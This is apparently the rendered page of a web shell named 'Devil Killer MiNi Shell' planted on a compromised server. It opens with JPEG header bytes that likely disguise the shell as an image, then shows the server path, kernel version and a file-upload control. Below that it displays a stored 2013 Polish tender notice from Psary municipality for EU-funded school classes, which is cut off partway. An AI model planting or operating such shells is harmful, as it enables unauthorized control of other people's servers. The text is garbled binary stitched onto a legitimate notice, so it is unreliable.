JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131023/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131023/431726-N-2013.html

<p class="kh_header"><b>Psary: Usługi edukacyjne obejmujące prowadzenie zajęć dla uczestników projektu pt.: Młodzież z przyszłością w klasach I -III Gimnazjum im. marszałka J. Piłsudskiego w Psarach ul. Szkolna 32, w okresie dwóch lat szkolnych 2013/2014 i 2014/2015, współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego</b><br>
<b>Numer ogłoszenia: 431726 - 2013; data zamieszczenia: 23.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy w Psarach , ul. Malinowicka 4, 42-512 Psary, woj. śląskie, tel. 32 294 49 00 wew. 41, faks 32 294 49 01.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.psary.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi edukacyjne obejmujące prowadzenie zajęć dla uczestników projektu pt.: Młodzież z przyszłością w klasach I -III Gimnazjum im. marszałka J. Piłsudskiego w Psarach ul. Szkolna 32, w okresie dwóch lat szkolnych 2013/2014 i 2014/2015, współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I. Przedmiotem zamówienia są  Usługi edukacyjne obejmujące prowadzenie zajęć dla uczestników projektu pt.: Młodzież z przyszłością w klasach I -III Gimnazjum im. marszałka J. Piłsudskiego w Psarach ul. Szkolna 32, w okresie dwóch lat szkolnych 2013/2014 i 2014/2015, współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego
II. Zakres, ilość i rodzaj zajęć został podzielony na 7 zadań: 
ZADANIE NR 1.  Organizacja zajęć specjalistycznych i korekcyjno - kompensacyjnych
ZADANIE NR 2.  Realizacja autorskiego programu zajęć dziennikarsko - redakcyjnych od słowa do artykułu
ZADANIE NR 3.  Organizacja autorskiego programu zajęć matematyczno-przyrodniczych
ZADANIE NR 4.  Organizacja zajęć informatycznych
ZADANIE NR 5.  Organizacja zajęć językowych
ZADANIE NR 6.  Organizacja Szkolnego Centrum Doradztwa Zawodowego
ZADANIE NR.7.  Opiekun dzieci na zajęcia wyjazdowe w ramach zadania 2,3,4 i 6
III. Powyższe zadania zostały podzielone na 18 szczegółowych części.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0, 80.34.00.00-9, 80.41.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 18.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie szczególnych wymagań.Ocena spełniania warunku dokonana zostanie zgodnie z formułą spełnia-nie spełnia na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 upzp, wyszczególnionego jako Zał nr 4 w SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie szczególnych wymagań.Ocena spełniania warunku dokonana zostanie zgodnie z formułą spełnia-nie spełnia na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 upzp, wyszczególnionego jako Zał nr 4 w SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie szczególnych wymagań.Ocena spełniania warunku dokonana zostanie zgodnie z formułą spełnia-nie spełnia na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 upzp, wyszczególnionego jako Zał nr 4 w SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie warunku dysponowania osobami zdolnymi do wykonania zamówienia, jeżeli Wykonawca wykaże, iż posiada co najmniej 1 osobę  (lub sam jest tą osobą) odpowiednio do części zamówienia na które składa ofertę posiadającą następujące uprawnienia i doświadczenie:
(dotyczy części: 1 ): 
Posiada: wykształcenie wyższe w zakresie logopedii z przygotowaniem pedagogicznym lub wykształcenie wyższe z przygotowaniem pedagogicznym oraz studia podyplomowe/ Kurs kwalifikacyjny w zakresie logopedii minimum 2 lata doświadczenia w pracy pedagogicznej,
(dotyczy części 2,3,4,5,6,7,8,9,10,11,12,13,18):
Posiadanie kwalifikacji do pracy w gimnazjum na stanowisku nauczyciela zgodnie z §3 Rozporządzenia MEN z dnia 12 marca 2009r., w sprawie szczególnych kwalifikacji wymaganych od nauczycieli ( Dz.U.z 2013r poz.1207) minimum 2 lata doświadczenia w pracy pedagogicznej,
(dotyczy części 8,14,15,16):
Posiadanie kwalifikacji do pracy w gimnazjum na stanowisku nauczyciela, zgodnie z §11 ust.2 Rozporządzenia MEN z dnia 12 marca 2009r., w sprawie szczególnych kwalifikacji wymaganych od nauczycieli ( Dz.U.z 2013r poz.1207) minimum 2 lata doświadczenia w pracy pedagogicznej,
(dotyczy części 17):
Posiadanie kwalifikacji do pracy w gimnazjum na stanowisku nauczyciela zgodnie z § 22 ust 2 Rozporządzenia MEN z dnia 12 marca 2009r., w sprawie szczególnych kwalifikacji wymaganych od nauczycieli ( Dz.U.z 2013r poz.1207) minimum 2 lata doświadczenia w pracy pedagogicznej.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie szczególnych wymagań.Ocena spełniania warunku dokonana zostanie zgodnie z formułą spełnia-nie spełnia na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 upzp, wyszczególnionego jako Zał nr 4 w SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz ofertowy Zał Nr 1 do SIWZ, 2. Oświadczenie o niekaralności Zał Nr 6 do SIWZ, 3. W zakresie warunków udziału w postępowaniu opisanych w pkt 2.2 do 2.4. (opis sposobu dokonywania oceny spełniania warunków) rozdziału V SIWZ, Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Zobowiązanie takie należy złożyć w oryginale lub kopii poświadczonej za zgodność z oryginałem notarialnie. Jeżeli Wykonawca wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, Zamawiający w celu oceny, czy wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny , czy stosunek łączący wykonawce z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, może żądać dokumentów w szczególności: a) zakresu dostępnych Wykonawcy zasobów innego podmiotu, b) sposobu wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia, c) charakteru stosunku, jaki będzie łączył wykonawcę z innym podmiotem, d) zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia. 4. Pełnomocnictwo (jeżeli dotyczy) ustanowione do reprezentowania Wykonawcy-ów ubiegającego-cych się o udzielenie zamówienia publicznego. Pełnomocnictwo należy składać w oryginale bądź kopii, potwierdzonej za zgodność z oryginałem notarialnie. 5. Informacje dodatkowe: z uwagi na opis dokonania oceny spełniania warunku Zamawiający nie wymaga podania w wykazie osób- osób odpowiedzialnych za kontrolę jakości o którym mowa w sekcji III.4.1). 6. Potwierdzenie spełniania warunków udziału w niniejszym postępowaniu, Zamawiający oceniał będzie w systemie 0-1 (zero jedynkowym tj. spełnia - nie spełnia).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zakres i warunki zmiany istotnych postanowień umowy: strony mogą zmienić istotne postanowienia umowy:
a)  zmiana ilości godzin w poszczególnych miesiącach z powodu okoliczności, których nie można było przewidzieć w chwili podpisania umowy.
b)  Dopuszcza się zmianę postanowień umowy, w stosunku do treści oferty wymaga to jednak zgody obu stron umowy; w przypadku wyniknięcia rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie , których nie można usunąć w inny sposób, a zmiana będzie umożliwiać usuniecie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów.
c) Wystąpienie okoliczności powodujących konieczność zmiany osób, które będą uczestniczyć w wykonywaniu  przedmiotu zamówienia  (przewidzianych w ofercie) na osoby o co najmniej równoważnych kwalifikacjach. 
1.1. Warunki dokonywania zmian:
a)  zmiana może być inicjowana na wniosek Zamawiającego lub Wykonawcy, przy czym strona wnioskująca zobowiązana jest do szczegółowego uzasadnienia proponowanych zmian,
b)  zmiana musi mieć aprobatę obu stron,
c)  zmiana musi być zgodna z SIWZ oraz ustawą , w tym w szczególności:
zmiana umowy nie może naruszać zasady zachowania uczciwej konkurencji oraz równego traktowania Wykonawców,
zmiana musi być wprowadzona w formie pisemnej pod rygorem nieważności,
zmiana nie może spowodować wykroczenia usługi poza przedmiot zamówienia opisany w nin. SIWZ.
zmiana wynagrodzenia Wykonawcy (ceny podanej w ofercie):
w przypadku ustawowej zmiany podatku VAT, 
d) zmiana przedstawicieli stron umowy, osób nadzorujących ze strony Zamawiającego i Wykonawcy. 
e)  wystąpienia innych istotnych okoliczności, które mogą mieć wpływ na prawidłowe wykonanie usług, a których nie można było przewidzieć w chwili zawarcia umowy pomimo zachowania należytej staranności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.psary.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Psarach ul. Malinowicka 4, 42-512 Psary II piętro pokój 211..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.10.2013 godzina 10:00, miejsce: Urząd Gminy w Psarach ul. Malinowicka 4, 42-512 Psary kancelaria ogólna - parter budynku..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> W związku z wpisaniem Gminy Psary na listę rankingową wniosków o dofinansowanie w ramach konkursu nr 1/POKL/9.1.2/2013, Gmina Psary zamierza realizować przedmiot zamówienia w ramach projektu: Młodzież z przyszłością Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych, w ramach Europejskiego Funduszu Społecznego Programu Operacyjnego Kapitał Ludzki.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ZADANIE NR 1.  Organizacja zajęć specjalistycznych i korekcyjno - kompensacyjnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część zamówienia nr 1
Prowadzenie zajęć logopedycznych dla dzieci z klas I-III z wadami wymowy w Gimnazjum w Psarach w 3 grupach zajęciowych, z których każda będzie miała 1 godzinę zajęć tygodniowo tj. 174 godzin zajęć w dwóch latach szkolnych 2013/2014 i 2014/2015 
Wykonawca będzie zobowiązany do: 
opracowania programu zajęć,
prowadzenia zajęć wg programu,
prowadzenia dzienników zajęć,
przeprowadzenia badania logopedycznego na wejściu i wyjściu i przedstawienia wyników badania na zakończenie każdego roku szkolnego; 
prowadzenia indywidualnych kart ucznia, oraz przedstawienie wyników obserwacji na koniec każdego roku szkolnego,
udział w przeprowadzeniu ankiet wśród rodziców uczniów uczęszczających na zajęcia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0, 80.34.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ZADANIE NR 1.  Organizacja zajęć specjalistycznych i korekcyjno - kompensacyjnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część zamówienia nr 2
Prowadzenie zajęć korekcyjno-kompensacyjnych dla dzieci z klas I-III ze specyficznymi trudnościami w uczeniu się: dysleksją, dysortografią i dysgrafią w Gimnazjum w Psarach w 4 grupach zajęciowych, z których każda będzie miała 1 godzinę zajęć tygodniowo tj. 232 godziny zajęć w dwóch latach szkolnych 2013/2014 i 2014/2015 .
Wykonawca będzie zobowiązany do:
opracowania programu zajęć,
prowadzenie zajęć wg programu,
prowadzenia dzienników zajęć,
przeprowadzenia badania uczniów na wejściu i wyjściu,
prowadzenia indywidualnych kart ucznia, oraz przedstawienie wyników obserwacji na koniec każdego roku szkolnego,
przeprowadzenia ankiet wśród rodziców uczniów uczęszczających na zajęcia,
wykorzystanie szkolnej platformy e-learningowej w prowadzeniu zajęć.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0, 80.34.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> ZADANIE NR 2.  Realizacja autorskiego programu zajęć dziennikarsko - redakcyjnych od słowa do artykułu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część zamówienia nr 3
Prowadzenie zajęć dziennikarskich dla uczniów klas I-III w Gimnazjum w Psarach w 1 grupie zajęciowej, która będzie miała 2 godziny zajęć co drugi tydzień tj. 58 godzin zajęć w dwóch latach szkolnych 2013/2014 i 2014/2015, 
Wykonawca będzie zobowiązany do:
opracowania programu zajęć, w którym ujęte zostanie zaproszenie dziennikarzy specjalistów na zajęcia warsztatowe, oraz 4 zajęcia wyjazdowe organizowane w redakcjach,
prowadzenia zajęć wg programu,
prowadzenia dzienników zajęć,
prowadzenie kart obserwacji uczniów i przedstawienia ich wyników na koniec każdego roku szkolnego,
Wydania gazetki szkolnej jako podsumowanie każdego roku szkolnego, 
wykorzystanie szkolnej platformy e-learningowej w prowadzeniu zajęć,
udział w zajęciach wyjazdowych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0, 80.41.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> ZADANIE NR 2.  Realizacja autorskiego programu zajęć dziennikarsko - redakcyjnych od słowa do artykułu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część zamówienia nr 4
Prowadzenie zajęć redakcyjnych dla uczniów klas I-III w Gimnazjum w Psarach w 1 grupie zajęciowej, która będzie miała 2 godziny zajęć co drugi tydzień z wykorzystaniem programu komputerowego do składania gazety tj. 58 godzin zajęć . w dwóch latach szkolnych 2013/2014 i 2014/2015
Wykonawca będzie zobowiązany do:
opracowania programu zajęć, 
prowadzenia zajęć wg programu,
prowadzenia dzienników zajęć,
prowadzenia kart obserwacji uczniów i przedstawienia ich wyników na koniec każdego roku szkolneg,
wydania wkładek do gazety gminnej Głos Szkolny
wykorzystanie szkolnej platformy e-learningowej w prowadzeniu zajęć.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0, 80.41.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> ZADANIE NR 3.  Organizacja autorskiego programu zajęć matematyczno-przyrodniczych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część zamówienia nr 5
Prowadzenie zajęć rozwijających Osobliwości świata przyrody z zakresu biologii oparte na wykonywaniu doświadczeń, prowadzeniu badań i eksperymentów w kl. I-III w Gimnazjum w Psarach w 3 grupach zajęciowych, z której każda z nich będzie miała 1 godzinę co 3 tygodnie tj.58 godzin zajęć w dwóch latach szkolnych 2013/2014 i 2014/2015r.
Wykonawca będzie zobowiązany do .
opracowania autorskiego programu z zakresu biologii, wchodzącego w skład programu zajęć Osobliwości świata przyrody, w którym zostaną ujęte zajęcia wyjazdowe organizowane przez Uniwersytet Śląski,
prowadzenia zajęć z zakresu biologii Osobliwości świata przyrody w oparciu o autorski program,
prowadzenia dzienników zajęć,
prowadzenia kart obserwacji uczniów i przedstawienia ich wyników na koniec każdego roku szkolnego,
przeprowadzenie ankiet wśród rodziców uczniów uczęszczających na zajęcia
